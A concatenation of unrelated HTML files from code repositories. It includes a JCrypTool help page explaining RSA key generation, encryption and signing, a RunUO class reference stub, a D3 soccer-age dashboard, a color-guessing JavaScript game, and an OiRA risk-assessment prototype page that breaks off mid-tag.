(CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
org.jcryptool.visual.rsa/nl/en/help/content/index.html
tassadarius/crypto
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>RSA encryption</title> <script id="MathJax-script" async src="${JCTJS_HOST}/javascript/MathJax-master/es5/tex-mml-svg.js"></script> <script src="${JCTJS_HOST}/javascript/jquery.js"></script> <script>TOC_generate_default("h2, h3")</script> <!-- <style> .toc-list-item {list-style-type: circle;} </style> --> </head> <body> <h1>RSA Cryptosystem (Encrypt, Decrypt, Sign, and Verify)</h1> <div class="TOC"></div> <hr /> <div class="content"> <!-- the TOC generation currently only looks within this 'content' class--> <!-- example for a in-line and multi-line equations--> <!-- <p> When \(a \ne 0\), there are two solutions to \(ax^2 + bx + c = 0\) and they are \[x = {-b \pm \sqrt{b^2-4ac} \over 2a}.\] </p> --> <p>This help file describes two things:<br/> <a href="#term">The RSA Scheme</a><br/> <a href="#plugin">Handling Instructions: How to Use this Visualization</a></p> <p> <b>Please note</b> that in this visualization the operations are performed on each single character. In practice, the operations are performed on blocks or even the whole message. Normally, RSA is not used to encrypt large amounts of data. Mostly, it is used to encrypt a session key, which later is used to encrypt the data with a symmetric cryptosystem (e.g. AES or 3DES), or to sign the hash value of a message. </p> <h2 id="term">The RSA Scheme</h2> <p> The most well-known asymmetric cryptosystem, RSA, was developed in 1977 by Ronald Rivest, Adi Shamir, and Leonard Adleman. The private and public keys are constructed using two randomly selected big prime numbers p and q which the user can specify himself</p> <p>Then, the user chooses two natural numbers e and d such that (e*d) = 1 mod ((p-1)(q-1)). The product p*q = N and e then serve as the public key, d as the private key. The initially generated primes p and q must be kept secret or better deleted afterwards.</p> <p>As this encryption algorithm only works on numbers, first the plaintext letters must be converted. This is generally done using the ASCII code, but one can of course also agree on A=0, B=1 .... Z=25.</p> <p>However, the number of each plaintext letter must be smaller than the product N. This becomes clear when you examine the encryption and decryption functions (m = plaintext letter, c = ciphertext letter): c = m^e mod N and m = c^d mod N.</p> <p>Calculating modulo means to determine the remainder from a number modulo N. If m would be allowed to be bigger than N it would not always be possible to obtain a unique ciphertext character.</p> <p>The security of the RSA scheme is based on two mathematical problems. First, it is hard to extract a root modulo N (RSA problem). Second, factorization of a number N = p*q is hard, if the factors are sufficiently large (RSA key problem).<br/></p> <h3 id="KeyGen">RSA Key Generation</h3> <p> A special characteristic of public key cryptosystems like RSA is that extensive calculations are necessary to generate the key before en-/decryption or signing can take place.</p> <p>First of all, the RSA parameters p, q, N and the Euler number phi(N) are calculated by choosing two different prime numbers p and q at random, and then by calculating the so-called RSA modulus N = p*q. The Euler number phi(N) = (p-1)*(q-1) is calculated from the prime factors p and q.</p> <p>In a second step, the public RSA exponent e is determined and from this, together with phi(N), the secret RSA exponent d is calculated. The number e is chosen as follows 1 < e < phi(N), with the property that e is relatively prime to phi(N). An especially popular value for e is 2^16+1 = 65537, as in most cases this is co-prime to phi(N) and is especially well-suited for square and multiply exponentiation resulting in a very fast public key operation.</p> <p>The secret exponent \( d = e^{-1}\; \text{mod}\; \text{phi}(\mathbb{N}) \) is calculated as the multiplicative inverse of the public exponent e modulo phi(N).</p> <p>After the RSA key generation, N and e can be published. Then, anyone could encrypt a message for the owner of the according secret RSA key d or check a digital signature &nbsp;&ndash; using only the public key. </p> <h3 id="Enc">RSA Encryption / Decryption</h3> <p> To <b>encrypt</b> data with the RSA scheme, the ciphertext is calculated using the public key e of the recipient and the plaintext. The encryption function is c = m^e mod N. This means that anyone can encrypt a message using the public key. But only the owner of the associated secret key d can then decrypt the message again. </p> <p> To <b>decrypt</b> a ciphertext with the RSA scheme, one needs to know the private key d. The decryption function, c^d = (m^e)^d = m^(e*d) = m mod N, yields the plaintext m. </p> <h3 id="Sig">RSA Signing / Verifying</h3> <p> To <b>sign</b> a message m with the RSA scheme, you need to know the private key d. The signing function is applied to m or to a hash value of m: m^d = sign(m) or (hash(m))^d = sign(hash(m)). This yields the signature.</p> <p> You can <b>verify</b> a digital RSA signature using the signer's public key e by computing (sign(m))^e = m' or (sign(hash(m)))^e = hash(m)'. The result of the RSA exponentiation is m' or hash(m)' which has to be compared with the message m or the hash of the message hash(m) computed from the received (and decrypted) document. If both hash values are identical this is considered as a proof that the real owner of the corresponding private RSA key has signed the document.</p> <h2 id="plugin">Handling Instructions: How to Use this Visualization</h2> <p> When the RSA visualization is started, you can select the desired operation, encrypt, decrypt, sign, or verify &nbsp;&ndash; by choosing the corresponding tab.</p> <p> The color of the buttons on the left side shows their current status. Red means that the step is not complete. When a button is green the corresponding step is complete. If the first two buttons are green, it is possible to start the encryption either with a click on <strong>Start</strong> or to directly finish it with a click on <strong>Encrypt</strong>. Using the button <strong>Reset</strong> it is possible to choose new values.</p> <p> First you need to select the required RSA keys. To do so, click on the <strong>Key generation / selection</strong> button on the left. You can either create a new keypair or load a saved keypair. When the encryption or verify tab is selected it is also possible to create or choose only a public key. Note that for these operations, encrypt and verify, a secret key is not required.</p> <p>When you choose the option <strong>New key pair</strong> you can either choose the parameters p, q, and e out of the drop down list, or fill in custom values (the numbers can be of any size as JCT uses an arbitrary-precision arithmetic library). Marking the checkbox <strong>Save key pair</strong> you can store the key for later use.</p> <p>The option <strong>Existing key pair</strong> loads a previously generated key pair. Choose a key out of the list and enter the corresponding password.</p> <p>When the encryption or verify tab is selected it is also possible to choose the options <strong>New public key</strong> and <Strong>Existing public key</Strong>. The option <strong>New public key</strong> allows you to enter N and e, and to choose if the key should be saved or not. The option <Strong>Existing public key</Strong> loads a previously stored public key.</p> <p>When you click on <strong>Finish</strong> the chosen key is automatically inserted and can be seen in the "Key" field (converted to hex).</p> <p>As sample how to proceed we describe the handling in the <strong>Encrypt</strong> tab. Next, click the <strong>Enter text</strong> button on the left. You can enter a text using ASCII characters. Every character will be converted to hex and can be seen in the "Entered text" field. If you mark the <strong>Enter numbers directly</strong> checkbox, you can insert decimal numbers separated by "SPACE". These numbers are converted to ASCII characters and can be seen in the "Entered text" field. On the next page it is possible to apply some filters on the text.</p> <p> Now, all required information is available and it is possible to start the operation. If you just want to see the result, you can click on the button <strong>Encrypt</strong> (below the <strong>Enter text</strong> button). Alternatively, in order to see the calculation of each number click on the <strong>Start</strong> button in the "Step-by-step calculations" field. Both ways (going stepwise or directly through all steps), the final result can be seen in the "Result" field.</p> <p> At the bottom, you can see additional options. There, you have the possibility to choose whether the key and result should be displayed in decimal, binary, or hex values, whether to inherit values from one of the three other tabs, and whether to show additional help in dialogs while performing the operation.</p> <p>For further information about the RSA cryptosystem please refer to:</p> <ul> <li><a href="PLUGINS_ROOT/org.jcryptool.visual.extendedrsa/$nl$/help/content/rsaHelp.html">JCT Plugin: Visualization of an Extended RSA Cryptosystem (including Identities and Multi-Prime RSA)</a> <li><a target="_blank" href="http://www.springer.com/de/book/9783662484234">Joachim von zur Gathen: CryptoSchool, Springer, 2015, Chapter 3</a></li> <li><a target="_blank" href="http://www.springer.com/de/book/9780387207568">Johannes Buchmann: Introduction to Cryptography, Springer, 2004, Chapter 8</a></li> <li><a target="_blank" href="http://en.wikipedia.org/wiki/RSA_(algorithm)">Wikipedia: RSA</a></li> <li><a target="_blank" href="https://www.cryptool.org/images/ctp/documents/CT-Book-en.pdf">The CrypTool Book, Chapter 4</a></li> </ul> <br/> </div> </body> </html>
docs/types/BaseRing.html
alucardxlx/caoticamente-shards
<html> <head> <title>RunUO Documentation - Class Overview - BaseRing</title> </head> <body bgcolor="white" style="font-family: Courier New" text="#000000" link="#000000" vlink="#000000" alink="#808080"> <h4><a href="../namespaces/Server.Items.html">Back to Server.Items</a></h4> <h2>BaseRing : <!-- DBG-1 --><a href="BaseJewel.html">BaseJewel</a>, <!-- DBG-2.2 --><a href="IEntity.html">IEntity</a>, <!-- DBG-2.2 --><a href="IPoint3D.html">IPoint3D</a>, <!-- DBG-2.2 --><a href="IPoint2D.html">IPoint2D</a>, <!-- DBG-2.1 --><font color="blue">IComparable</font>, <!-- DBG-2.1 --><font color="blue">IComparable</font>&lt;<a href="IEntity.html">IEntity</a>&gt;, <!-- DBG-2.2 --><a href="IHued.html">IHued</a>, <!-- DBG-2.1 --><font color="blue">IComparable</font>&lt;<a href="Item.html">Item</a>&gt;, <!-- DBG-2.2 --><a href="ISerializable.html">ISerializable</a>, <!-- DBG-2.2 --><a href="ICraftable.html">ICraftable</a></h2> <h4>Derived Types: <!-- DBG-3 --><a href="GoldRing.html">GoldRing</a>, <!-- DBG-3 --><a href="SilverRing.html">SilverRing</a></h4> (<font color="blue">ctor</font>) BaseRing( <font color="blue">int</font> itemID )<br> (<font color="blue">ctor</font>) BaseRing( <!-- DBG-0 --><a href="Serial.html">Serial</a> serial )<br> <font color="blue">int</font> BaseGemTypeNumber( <font color="blue">get</font>; )<br> <font color="blue">virtual</font> <font color="blue">void</font> Deserialize( <!-- DBG-0 --><a href="GenericReader.html">GenericReader</a> reader )<br> <font color="blue">virtual</font> <font color="blue">void</font> Serialize( <!-- DBG-0 --><a href="GenericWriter.html">GenericWriter</a> writer )<br> </body> </html>
site/application.html
kirito88/stillcrazyafteralltheseyears
<!DOCTYPE html> <html lang="en"> <head> <!-- Bootstrap *must* tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>CS424: Age Distribution</title> <link href="./bootstrap-3.3.5-dist/css/bootstrap.min.css" rel="stylesheet"> <!-- Bootstrap --> <script type="text/javascript" src="./d3/d3.min.js"></script> <!-- D3 --> <!-- Import files to render maps, barcharts and pie charts --> <script type="text/javascript" src="./js/app.js"></script> <script type="text/javascript" src="./js/bar.js"></script> <script type="text/javascript" src="./js/pie.js"></script> <link href="./css/bar.css" rel="stylesheet"> <link href="./css/pie.css" rel="stylesheet"> <link href="./css/app.css" rel="stylesheet"> <style> #states { -webkit-column-count:2; -moz-column-count:2; -ms-column-count:2; -o-column-count:2; column-count:2; columns:2; margin: 5px 10px 0px 25px; background-color: #fff; border-color:#ccc; /*-webkit-border-radius: 50px; -moz-border-radius: 50px; border-radius: 50px;*/ } #states p:first-child { padding-top: 10px; padding-left: 5px; } #states p { padding-left: 5px; } #map_container { margin: 5px 0px 0px 0px; background-color: grey; } </style> </head> <body> <div class="main-wrapper"> <!-- Fixed navbar --> <div class="container"> <nav class="navbar navbar-default"> <div class="container"> <div class="navbar-header"> <a class="navbar-brand page_title" href="#">Still Crazy After All These Years!</a> </div> <div id="navbar" class="navbar-collapse collapse"> <ul class="nav nav-pills navbar-right"> <li><a class="menu_label" href="/index.html">Home</a></li> <li><a class="menu_label" href="/howtouse.html">How to Use</a></li> <li class="active"><a class="menu_label" href="#">Application</a></li> <li><a class="menu_label" href="/data.html">Data</a></li> <li><a class="menu_label" href="/instructions.html">Instructions</a></li> <li><a class="menu_label" href="/findings.html">Findings</a></li> </ul> </div> </div> </nav> </div> <div class="content-row group"> <div class="col-1"> <div class="btn-group btn-group-justified" role="group"> <div class="btn-group" id="cont-btn-usa" role="group"></div> </div> <div id="states" ></div> </div> <div id="controls" class="col-2"> <div class="map" id="map"></div> <div id="countries" class="btn-group btn-group-justified" role="group"> </div> <div class="panel panel-default"> <div class="panel-heading"> <span class="panel-title events-title">Events in Soccer History</span> </div> <div class="panel-body"> <ul id="event-list" class="list-group"> </ul> </div> </div> </div> <div id="graphs_container" class="col-3"> <div id="graph_container_top"> <div id="pc0" class="state-graph free_pc"></div> <div id="pc1" class="state-graph free_pc"></div> <div id="pc2" class="state-graph free_pc"></div> <div id="pc3" class="state-graph free_pc"></div> <div id="pc4" class="state-graph free_pc"></div> </div> <div id="graph_container_bottom"> <div id="bc0" class="state-graph free_bc"></div> <div id="bc1" class="state-graph free_bc"></div> <div id="bc2" class="state-graph free_bc"></div> <div id="bc3" class="state-graph free_bc"></div> <div id="bc4" class="state-graph free_bc"></div> </div> <div id="dashboard-control-1" class="btn-group btn-group-justified" role="group"> <div class="btn-group" role="group"> <button type="button" id="btn1yr" class="btn btn-default btn-lg age-range">1 Year Range</button> </div> <div class="btn-group" role="group"> <button type="button" id="btn10yr" class="btn btn-primary btn-lg age-range">10 Years Range</button> </div> </div> <div id="dashboard-control-2" class="btn-group btn-group-justified" role="group"> </div> </div> </div> </div> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script> <!-- Include all compiled plugins (below), or include individual files as needed --> <script src="./bootstrap-3.3.5-dist/js/bootstrap.min.js"></script> <script type="text/javascript"> var app = new App("#map", "#states"); app.init(); d3.select("#btn1yr").on("click", function(d){ updateSelectedButton("#btn1yr"); for(var i = 0; i < app.app.values.length; i++) app.app.values[i].updateRange(1); }); d3.select("#btn10yr").on("click", function(d){ updateSelectedButton("#btn10yr"); for(var i = 0; i < app.app.values.length; i++) app.app.values[i].updateRange(10); }); function updateSelectedButton(id){ d3.selectAll(".age-range").classed("btn-primary", false); d3.selectAll(".age-range").classed("btn-default", true); d3.select(id).classed("btn-primary", true); } </script> </body> </html>
HTML-CSS-JavaScript/assignment2/part2.html
mikedanylov/full-stack-dev
<!DOCTYPE html> <html> <head> <meta charset="utf-8"/> <title>Guess the Color Game</title> </head> <body> <script> var colors = ['aqua', 'wheat', 'tan', 'orchid', 'bisque', 'chocolate', 'lime', 'olive', 'plum', 'salmon', 'tomato']; do_game(); function do_game(){ var answer = colors[Math.floor(Math.random() * colors.length)]; var count_guess = 0; // Uncomment the next line to see answer in console // console.log("the answer is " + answer); while (guess != answer){ count_guess++; var guess = prompt("I am thinking of one of these colors:\n\n" + colors + "\n\nWhat color am I thinking of?", "color"); check_guess(guess, answer); } document.body.style.background = answer; alert("Congratulations! You have guessed the color!\n\nIt took " + count_guess + " guesses to finish the game!\n\nYou can see the color in the background."); } function check_guess(guess, answer){ if (includes(guess, colors)){ if (guess > answer) alert("Sorry, your guess is not correct!\n\nHint: your color is alphabetically higher than mine.\n\nPlease try again."); else if (guess < answer) alert("Sorry, your guess is not correct!\n\nHint: your color is alphabetically lower than mine.\n\nPlease try again."); } else{ alert("Sorry, I don't recognize your color.\n\nPlease try again."); } } function includes(what, where){ for (var i = 0; i < colors.length; i++){ if (what == where[i]) return true; } return false; } </script> </body> </html>
src/euphorie/client/resources/oira/help/it/illustrations/profiling.html
euphorie/Euphorie
<!DOCTYPE html> <html class="no-js" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>OiRA</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link id="all-styles" rel="stylesheet" href="../../../style/all.css" type="text/css"> <script src="../../../script/bundle-help.js" type="text/javascript"></script> <!-- Following line is ONLY for the prototype. --> <meta name="robots" content="noindex" /> <meta name="description" content=""> <meta property="og:type" content="website" /> <meta property="og:title" content="" /> <meta property="og:description" content="" /> <meta property="og:url" content="//assets/oira/help/it/illustrations/profiling" /> <meta property="og:image" content="../../../style/oira-tile.png" /> <link rel="icon" type="image/png" href="../../../favicon/apple-touch-icon.png" /> <meta name="theme-color" content="#10B2E4"> <!-- Manifest --> <link rel="manifest" href="/assets/oira/manifest/manifest.json"> </head> <body id="body" data-page-layout="risk-assessment" data-layout-layout="generic" class=" osh-off osc-off osc-size-normal osc-s-off "> <div id="main" class="sidebar-off"> <header id="toolbar"> <a href="/index-logged-in.html" data-pat-inject="source: #content; target: #content; history: record" class="pat-inject pat-switch title-group" data-pat-switch="selector: body; remove: osc-s-on; add: osc-s-off;" title="Startup page"> <h1 class="logo"> OiRA </h1> </a> <a href="#osc" id="toggle-osc" class="iconified pat-toggle" data-pat-toggle="selector: body; value: osc-off osc-on && selector: body; value: osc-s-off osc-s-on;">Toggle risk assessment browser</a> <a href="/feedback/osh.html#osh-osc-toggle" id="osh-target-osc-toggle" class="onscreen-help pat-tooltip" data-pat-tooltip="trigger: click; source: ajax; class: rich info;">Help</a> <a href="/feedback/more-menu#menu-content" id="user-menu" class="iconified pat-tooltip pat-switch" data-pat-switch="selector: body; remove: osc-s-on; add: osc-s-off;" data-pat-tooltip="source: ajax">Menu</a> <a href="/feedback/help-menu#menu-content" id="help-menu" class="iconified pat-tooltip" data-pat-tooltip="source: ajax">Help</a> <a href="/index-logged-in.html" data-pat-inject="source: #content; target: #content; history: record" class="home pat-inject iconified icon-home pat-switch" data-pat-switch="selector: body; remove: osc-s-on; add: osc-s-off;" title="Startup page">Dashboard</a> </header> <div id="content"> <aside id="tree" class="variation-risk-assessment"> <a href="/feedback/osh.html#osh-tool-navigation" id="osh-target-tool-navigation" class="onscreen-help pat-tooltip" data-pat-tooltip="trigger: click; source: ajax; class: rich info;">Help</a> <ol id="steps" class="navigation"> <li id="step-1" class="complete "> <a href="//index#content" data-pat-inject="history: record" class="preparation pat-switch pat-inject" data-pat-switch="selector: #main; remove: sidebar-*; add: sidebar-off">Presentazione</a> </li> <li id="step-involve" class=""> <a href="//involve#content" class="involve pat-inject pat-switch" data-pat-switch="selector: #main; remove: sidebar-*; add: sidebar-off" data-pat-inject="history: record">Processo di VR</a> </li> <li class=" " id="step-2"> <a href="#content" data-pat-inject="history: record" class="identification pat-switch pat-inject" data-pat-switch="selector: #main; remove: sidebar-*; add: sidebar-off">Identificazione + Valutazione</a> </li> <li id="step-4" class=" "> <!-- The tree for the action section uses the same structure as the identification tree, with the only differences that only risks and their parent modules are shown and that the entire tree is expanded. --> <a href="//action-plan#content" data-pat-inject="history: record" class="action-plan pat-switch pat-inject" data-pat-switch="selector: #main; remove: sidebar-*; add: sidebar-off">Misure di miglioramento</a> </li> <li id="step-5" > <a class="report pat-switch pat-inject" data-pat-inject="history: record" data-pat-switch="selector: #main; remove: sidebar-*; add: sidebar-off" href="//report#content">Report</a> </li> <li id="status" class=""> <a href="//status#content" data-pat-inject="history: record" class="status pat-switch pat-inject" data-pat-switch="selector: #main; remove: sidebar-*; add: sidebar-off">Stato <!-- <strong class="pie-graph pat-tooltip" data-pat-tooltip="trigger: hover; position-list: lm" data-percentage="0" title="0% Complete">0%</strong> --></a> </li> <li id="home"> <a href="/assessments#content" data-pat-inject="history: record" class="home pat-switch pat-inject" data-pat-switch="selector: #main; remove: sidebar-*; add: sidebar-off"></a> </li> </ol> </aside> <div id="main-content" class="variation-risk-assessment"> <div id="main-content"> <div id="content-pane"> <article class="pat-rich"> <h1>La valutazione del rischio nella tua organizzazione</h1> <p>Ai fini di effettuare la valutazione dei rischi nella tua azienda, ti verrà richiesto di:</p> <ul> <li>Selezionare l’opzione pertinente alla tua attività lavorativa</li> <li>In caso di più attività/siti/unità produttive, elencarli singolarmente utilizzando l’apposito “comando”</li> </ul> </article> <form class="pat-inject" method="get" action="assessment#main"> <fieldset class="vertical"> <h2> Commercial manned guarding </h2> <fieldset class="pat-checklist radio"> <legend>Does your organisation provide commercial manned guarding?</legend> <label> <input type="radio" class="presence" required="required" name="pq492.present" value="yes"> Yes </label> <label> <input type="radio" class="presence" required="required" name="pq492.present" value="no"> No </label> </fieldset> <fieldset class="pat-checklist radio pat-depends" data-pat-depends="pq492.present=yes"> <legend>Do you offer this service in multiple locations?</legend> <label> <input type="radio" class="multiple" name="pq492.multiple" value="yes"> Yes </label> <label> <input type="radio" class="multiple" name="pq492.multiple" value="no" checked="checked"> No </label> </fieldset> <fieldset class="group pat-depends" data-pat-depends="condition: pq492.present=yes and pq492.multiple"> <legend> <span class="pat-depends" data-pat-depends="pq492.multiple=no">Please enter a name for the location you would like to assess.</span> <span class="pat-depends" data-pat-depends="pq492.multiple=yes">Please enter the name for each location you would like to assess.</span> </legend> <fieldset class="group form-iteration pat-clone" data-pat-clone="template: #clone-template-1; trigger-element: #clone-set-1"> <template id="clone-template-1"> <label> <input placeholder="Name of location #{1}" size="40" type="text" class="pat-autofocus" name="492:utf8:utext:list">&nbsp;<button type="button" class="remove-clone icon-trash iconified">Remove</button> </label> </template> <label> <input placeholder="Name of location" size="40" type="text" name="492:utf8:utext:list" class="pat-depends pat-autofocus" data-pat-depends="pq492.multiple=no" /> <input placeholder="Name of location 1" size="40" type="text" name="492:utf8:utext:list" class="pat-depends pat-autofocus" data-pat-depends="pq492.multiple=yes" /> </label> </fieldset> <p class="buttons pat-depends" data-pat-depends="pq492.multiple=yes"> <button id="clone-set-1" class="pat-button icon-plus-circle add-clone" type="button">Add another item</button> </p> </fieldset> </fieldset> <fieldset class="vertical"> <h2>Mobile partrolling/intervention after alarm</h2> <fieldset class="pat-checklist radio"> <legend>Does your organisation provide mobile patrolling / intervention after alarm?</legend> <label><input type="radio" class="presence" required="required" name="pq504.present" value="yes"> Yes</label> <label><input type="radio" class="presence" required="required" name="pq504.present" value="no" checked="checked"> No</label> </fieldset> <fieldset class="pat-checklist radio pat-depends" data-pat-depends="pq504.present=yes"> <legend>Do you offer this service in multiple locations?</legend> <label> <input type="radio" class="multiple" name="pq504.multiple" value="yes"> Yes </label> <label> <input type="radio" class="multiple" name="pq504.multiple" value="no" checked="checked"> No </label> </fieldset> <fieldset class="group pat-depends" data-pat-depends="condition: pq504.present=yes and pq504.multiple"> <legend> <span class="pat-depends" data-pat-depends="pq504.multiple=no">Please enter a name for the location you would like to assess.</span> <span class="pat-depends" data-pat-depends="pq504.multiple=yes">Please enter the name for each location you would like to assess.</span> </legend> <fieldset class="pat-clone form-iteration" data-pat-clone="template: #clone-template-2; trigger-element: #clone-set-2"> <template id="clone-template-2"> <label> <input placeholder="Name of location #{1}" size="40" type="text" class="pat-autofocus" name="504:utf8:utext:list">&nbsp;<button type="button" class="pat-button small remove-clone icon-trash iconified">Remove</button> </label> </template> <label> <input placeholder="Name of location" size="40" type="text" name="492:utf8:utext:list" class="pat-autofocus pat-depends" data-pat-depends="pq504.multiple=no" /> <input placeholder="Name of location 1" size="40" type="text" name="492:utf8:utext:list" class="pat-autofocus pat-depends" data-pat-depends="pq504.multiple=yes" /> </label> </fieldset> <p class="buttons pat-depends" data-pat-depends="pq504.multiple=yes"> <button id="clone-set-2" class="pat-button icon-plus-circle add-clone" type="button">Add another item</button> </p> </fieldset> </fieldset> <fieldset class="vertical"> <h2>Event security</h2> <fieldset class="pat-checklist radio"> <legend>Does your organisation provide event security?</legend> <label><input type="radio" class="presence" required="required" name="pq505.present" value="yes"> Yes</label> <label><input type="radio" class="presence" required="required" name="pq505.present" value="no" checked="checked"> No</label> </fieldset> <fieldset class="pat-checklist radio pat-depends" data-pat-depends="pq505.present=yes"> <legend>Do you offer this service in multiple locations?</legend> <label><input type="radio" class="multiple" name="pq505.multiple" value="yes"> Yes</label> <label><input type="radio" class="multiple" name="pq505.multiple" value="no" checked="checked"> No</label> </fieldset> <fieldset class="group pat-depends" data-pat-depends="condition: pq505.present=yes and pq505.multiple"> <legend> <span class="pat-depends" data-pat-depends="pq505.multiple=no">Please enter a name for the location you would like to assess.</span> <span class="pat-depends" data-pat-depends="pq505.multiple=yes">Please enter the name for each location you would like to assess.</span> </legend> <fieldset class="form-iteration pat-clone" data-pat-clone="template: #clone-template-3; trigger-element: #clone-set-3"> <template id="clone-template-3"> <label> <input class="pat-depends pat-autofocus" placeholder="Name of location #{1}" size="40" type="text" name="505:utf8:utext:list" data-pat-depends="pq505.multiple=yes">&nbsp; <button type="button" class="pat-depends remove-clone icon-trash iconified" data-pat-depends="pq505.multiple=yes">Remove</button> </label> </template> <label> <input placeholder="Name of location" size="40" type="text" name="492:utf8:utext:list" class="pat-autofocus pat-depends" data-pat-depends="pq505.multiple=no" /> <input placeholder="Name of location 1" size="40" type="text" name="492:utf8:utext:list" class="pat-depends pat-autofocus" data-pat-depends="pq505.multiple=yes" /> </label> </fieldset> <p class="buttons pat-depends" data-pat-depends="pq505.multiple=yes"> <button id="clone-set-3" class="pat-button icon-plus-circle add-clone" type="button">Add another item</button> </p> </fieldset> </fieldset> <p class="button-bar"> <button class="pat-button" type="submit">Save and continue</button> </p> </form> </div> </div> <a href="#content-pane" class="pat-scroll" data-pat-scroll="selector: #content-pane; trigger: auto; offset: 0" hidden >Scroll to top</a> </div> </div> </div> <aside id="osc"> <form id="osc-header" action="/index-logged-in#browser" class="pat-inject pat-autosubmit"> <!-- The back button and current group title is shown in browsing mode within a group. --> <a href="/index#osc" data-pat-inject="source: #osc-header; target: #osc-header && source: #miller-columns; target: #miller-columns" class="back-button pat-inject">Back</a> <h2 class="column-title"> profiling.html </h2> <!-- <a href="/new-session.html#document-content" id="button-new-session-quick" data-pat-modal="class: large" class="no-label pat-modal iconified icon-plus" title="Start a new assessment">New</a> --> <div class="pat-collapsible pat-context-menu closed align-right" data-pat-collapsible="close-trigger: *:not(#more-menu)" id="more-menu"> <strong class="context-menu-label iconified more-menu-trigger"></strong> <ul class="menu"> <li> <a href="/new-session.html#document-content" data-pat-modal="class: medium panel" class="no-label pat-modal icon-plus pat-switch" data-pat-switch="body osc-s-* osc-s-off" title=""></a> </li> <li> <label class="pat-checklist"><input type="checkbox" name="archived" /> </label> </li> <li> <fieldset class="pat-checklist radio"> <label><input type="radio" value="all" name="ass-type" checked /> </label> <label><input type="radio" value="regular" name="ass-type" /> </label> <label><input type="radio" value="contractor" name="ass-type" /> </label> </fieldset> </li> </ul> </div> <button id="button-osc-expand" class="no-label iconified icon-resize-full pat-toggle" data-pat-toggle="selector: body; value: osc-size-full osc-size-normal" title=""></button> </form> <a href="/feedback/osh.html#osh-ra-browser" id="osh-target-ra-browser" class="onscreen-help pat-tooltip" data-pat-tooltip="trigger: click; source: ajax; class: rich info;">Help</a> <div id="navigation"> <div id="miller-columns" class="miller-columns"> <form class="search-form pat-inject view-compact" id="search-form" action="/feedback/search-results.html#browser" > <fieldset class="search-box-body"> <label class="search-field pat-subform pat-inject pat-autosubmit" data-pat-inject="source: #browser; target: #browser; && source: #osc-header; target: #osc-header"> <input type="search" value="" class="quick-search pat-autofocus" placeholder="" /> <button type="submit" name="standard" value="main" class="search-button-main assistive">Cercare</button> </label> <fieldset class="advanced-search pat-inject pat-subform" data-pat-inject="source: #browser; target: #browser; && source: #osc-header; target: #osc-header"> <fieldset class="advanced pat-clone" data-pat-clone="trigger-element: .add-clone-rule; remove-behaviour: none; template: #clone-template"> <input type="hidden" name="search-rule.and-or:records" value="" /> <p class="clone search-rule row-1"> <label class="pat-select field-choice pat-select"> <select name="search-rule.data-field:records"> <option value="SearchableText"></option> <optgroup label="Metadata"> <option value="Title">Title</option> <option value="Description">Description</option> <option value="content">Body text</option> <option value="author">Author</option> <option value="plant">Plant</option> <option value="department">Department</option> <option value="contractor">Contractor</option> <option value="operator_id">Operator at Daimler</option> <option value="created">Creation date</option> <option value="effective">Publication date</option> <option value="modified">Modification date</option> <option value="start_date">Start date (external company)</option> <option value="end_date">End date (external company)</option> </optgroup> </select> </label> <span class="parameters lemma"> <label class="pat-select"> <select name="search-rule.lemma-operator:records"> <option value="contains"></option> <option value="contains-not"></option> <option value="equals"></option> </select> </label> <input type="text" name="search-rule.lemma-value:records" placeholder="Lemma" class="lemma-field" /> </span> <span class="parameters date"> <label class="pat-select"> <select name="search-rule.date-operator:records"> <option value="is"></option> <option value="is-before"></option> <option value="is-after"></option> </select> </label> <input type="date" name="search-rule.date-value:records" placeholder="Date" class="date-field pat-date-picker" /> </span> <span class="parameters plant"> <label class="pat-select"> <select name="search-rule.date-operator:records"> <option value="equals"></option> <option value="equals-not"></option> </select> </label> <select name="search-rule.plant-value:records" placeholder="Plant code" class="pat-autosuggest lemma-field"> <option>001</option> <option>002</option> <option>003</option> <option>004</option> <option>005</option> </select> </span> <span class="parameters department"> <label class="pat-select"> <select name="search-rule.date-operator:records"> <option value="equals"></option> <option value="equals-not"></option> </select> </label> <select name="search-rule.department-value:records" placeholder="Department name" class="pat-autosuggest lemma-field"> <option>103, (GEPJW5W4P)</option> <option>104, (GEPJNROAL)</option> <option>105, (GEPJS5CBN)</option> <option>106, (GEPJS9JKO)</option> <option>107, (GEPJW92WQ)</option> <option>109, Milan K (H7N36URGR)</option> <option>111, (GEPJNV12M)</option> <option>140, (GEPL71JKV)</option> <option>141, (JGHN3Y100)</option> <option>142, (GEPL74BAW)</option> </select> </span> </p> </fieldset> <p class="button-bar"> <button type="submit" class="pat-button icon-search small">Cercare</button> <button type="button" class="pat-button add-clone add-clone-rule icon-plus-circle small"></button> </p> <template id="clone-template"> <p class="clone search-rule animated fadeIn"> <label class="and-or pat-select bare"> <select name="search-rule.and-or:records"> <option value="and"> </option> <option value="or"> </option> </select> </label> <label class="field-choice pat-select"> <select name="search-rule.data-field:records"> <option value="SearchableText"></option> <optgroup label="Metadata"> <option value="Title">Title</option> <option value="Description">Description</option> <option value="content">Body text</option> <option value="author">Author</option> <option value="plant">Plant (code)</option> <option value="department">Department</option> <option value="contractor">Contractor</option> <option value="created">Creation date</option> <option value="effective">Publication date</option> <option value="modified">Modification date</option> </optgroup> </select> </label> <span class="parameters lemma"> <label class="pat-select"> <select name="search-rule.lemma-operator:records"> <option value="contains"></option> <option value="contains-not"></option> <option value="equals"></option> </select> </label> <input type="text" name="search-rule.lemma-value:records" placeholder="Lemma" class="lemma-field" /> </span> <span class="parameters date"> <label class="pat-select"> <select name="search-rule.date-operator:records"> <option value="is"></option> <option value="is-before"></option> <option value="is-after"></option> </select> </label> <input type="date" name="search-rule.date-value:records" placeholder="Date" class="date-field pat-date-picker" /> </span> <span class="parameters plant"> <label class="pat-select"> <select name="search-rule.date-operator:records"> <option value="equals"></option> <option value="equals-not"></option> </select> </label> <select name="search-rule.plant-value:records" placeholder="Plant code" class="pat-autosuggest"> <option>001</option> <option>002</option> <option>003</option> <option>004</option> <option>005</option> </select> </span> <span class="parameters department"> <label 